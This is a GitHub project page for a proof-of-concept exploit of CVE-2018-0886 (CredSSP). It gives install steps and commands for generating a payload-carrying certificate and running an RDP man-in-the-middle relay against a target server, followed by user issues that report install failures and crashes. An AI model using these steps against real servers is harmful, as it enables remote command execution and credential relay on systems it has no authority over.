preempt / credssp Goto Github PK

A code demonstrating CVE-2018-0886

License: MIT License

Python 87.59% Shell 12.41%

credssp's Introduction

credssp

This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only. It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay.

Written by Eyal Karni, Preempt [email protected]

Build

Instructions (Linux)

If you are using Ubuntu 14 , check the install file.. It was tested on Ubuntu 16.04.

$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install

It assumes a pretty clean inital state. Best to uninstall first relevant components such as cryptography, pyopenssl maybe (pip uninstall cryptography).
A different version of openssl needed to be installed for this to run successfully. The install script does that.
Please follow the instructions in the described order.

Running the exploit

Export a certificate suitable for Server Authentication from any domain. (It is used for RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

To generate a certificate that exploits the vulnerability(contains the payload),use:

$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD

(ExportedCert is the exported certificate from step 1. exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)

To run the attack script:

$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

More details are in the usage section of the scripts(--help).

credssp's People

Contributors

Stargazers

Watchers

Forkers

vysecurity ajblane tanharoh riviera12345 nomadh7 0xffffe001 hacker-one wllidr xenoscr ogresos jbarcia peterg75 pich4ya linuxdemo w00t3k gavz phpplay apatedolos cclauss johnhubcr idkwim orf53975 rvrsh3ll sececter alextco eniac888 minkione cftong adjeielias90 m4rm0k igneel 0x13337 test1213145 opt9 mandavavrao hagen3000 nabz0r stevebanik-ndsc 3206614665 bb33bb firefalc0n limkokholefork 12edefdede heikipikker helloexp lazerhawk avi8892 hackjackyer jimsonzhang 5l1v3r1 all-the-time bahadirtmzr snrna fdlucifer ditanexp sectestt elijahahianyo nanaao jrandomsage iq-scm gastony werwolfz

credssp's Issues

certificate file location

For the command
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD

Where do you find the ExportedCert file?

Script Crash

Hi,
After running the script I got this error:

Tried 4050 primes...
Traceback (most recent call last):
File "gen_cmd.py", line 182, in
main()
File "gen_cmd.py", line 178, in main
genCertAndPriv(args.certFile,args.privFile,args.E,n,d)
File "gen_cmd.py", line 133, in genCertAndPriv
replaceKey(certFile,a._save_pkcs1_der())
File "gen_cmd.py", line 107, in replaceKey
cert = Certificate.decode(s.decode('base64'))
File "build/bdist.linux-x86_64/egg/ct/crypto/asn1/types.py", line 554, in decode

File "build/bdist.linux-x86_64/egg/ct/crypto/asn1/types.py", line 502, in read

ct.crypto.error.ASN1TagError: Invalid tag: expected [UNIVERSAL 16], got while decoding Certificate

Ct.crypto.asn1.x509 can no longer be downloaded

I used PIP install to download ct.crypto.asn1.x509 and found that the download address was 404
Error message:
Could not install packages due to an EnvironmentError: 404 Client Error: Not Found for url: https://pypi.org/simple/ct-crypto-asn1-x509/

Relay dosn't work

When i run rdpy-rdpcredsspmitm.py following Readme doc, RDP just return the Desktop of the target correctly. so i run wireshark in the MITM machine, but captured nothing relevant to CredSSP. Is there something wrong with MITM? would this python script implement MITM automatically? Waiting for your reply, please. Thanks!

OpenSSL version 1.1.0 hardcoded in install.sh

Just a little typo.

https://github.com/preempt/credssp/blob/master/install/install.sh#L30

You use ${OPENSSL_VERSION} variable throughout the install.sh but not on line 30.

Broken.

Hey,
I think I got this exploit working only once in my life, and that was 18 months ago.
QT4 is dead, it is near impossible to compile SIP+QT4+Qmake (with 2 different OS's) and all the other jazz, not to mention Openssl 1.1.1.
Any chance of fixing this?

Thanks
Dviros

can't generate a suitable certificate

python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
Traceback (most recent call last):
File "credssp/bin/gen_cmd.py", line 7, in
from math_helper import *
File "/root/credssp/credssp/bin/math_helper.py", line 2, in
from primesieve import *
ImportError: No module named primesieve

"primesieve" module is installed in my system.

Cert file not found

after running
python gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
getting Cert file not found

script crash

Traceback (most recent call last):
File "gen_cmd.py", line 183, in
main()
File "gen_cmd.py", line 179, in main
genCertAndPriv(args.certFile,args.privFile,args.E,n,d)
File "gen_cmd.py", line 125, in genCertAndPriv
r = rsa.PrivateKey(n, e, d, p, q, exp1=e, exp2=e,coef=e)
TypeError: init() got an unexpected keyword argument 'exp2'

Exploit crashes

ImportError: No module named ct.crypto.asn1.x509